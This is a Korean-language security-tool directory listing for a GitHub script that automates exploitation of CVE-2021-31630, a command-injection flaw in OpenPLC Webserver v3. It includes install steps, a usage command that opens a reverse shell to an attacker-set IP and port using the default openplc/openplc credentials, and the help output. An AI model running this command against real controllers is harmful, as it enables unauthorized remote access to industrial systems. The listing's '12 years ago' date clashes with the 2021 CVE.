Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/adibna/cve-2021-31630
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubadibna/cve-2021-31630

cve-2021-31630

This is a automation of cve-2021-31630 exploitation

저장소 보기
12년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

이 스크립트는 OpenPLC Web Server v3의 취약점을 자동으로 악용합니다.

수동 기술을 사용하지 않고 서버에서 자동 리버스 쉘을 생성할 수 있습니다.

CVE-2021-31630 상세 Open PLC Webserver v3의 명령 삽입 취약점으로 인해 원격 공격자가 애플리케이션의 "/hardware" 페이지에 있는 "Hardware Layer Code Box" 구성 요소를 통해 임의 코드를 실행할 수 있습니다.

이 스크립트는 OpenPLC에서 스크립트 등록을 완료한 후 동일한 터미널에서 머신의 쉘을 생성하도록 사용자 지정되었습니다.

아래 명령어를 사용하세요 (종속성을 설치하기 위해 Python 가상 환경을 생성하는 것이 좋습니다) # 단, breakerplc.py 스크립트는 가상 환경 외부에서 실행해야 합니다.

root@kitploit:~
sudo apt update
pip3 install requests

사용 방법? 아래 명령줄을 사용할 수 있습니다.

root@kitploit:~
python breakerplc.py -lh <your local ip> -lp 4444 <http://machine ip:8080> -u openplc -p openplc

root@kitploit:~
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url

positional arguments:
  url         Target URL with http(s)://

options:
  -h, --help  show this help message and exit
  -u U        Username
  -p P        Password
  -t T        Request Timeout, increase if server is slow
  -lh LH      LHOST
  -lp LP      LPORT

2024-06-21 19-53-25

중요 연결 후, 쉘을 반환하기 위해 코드 라인을 끊으려면 "whoami" 또는 "ls"를 입력해야 합니다. image

도구 다운로드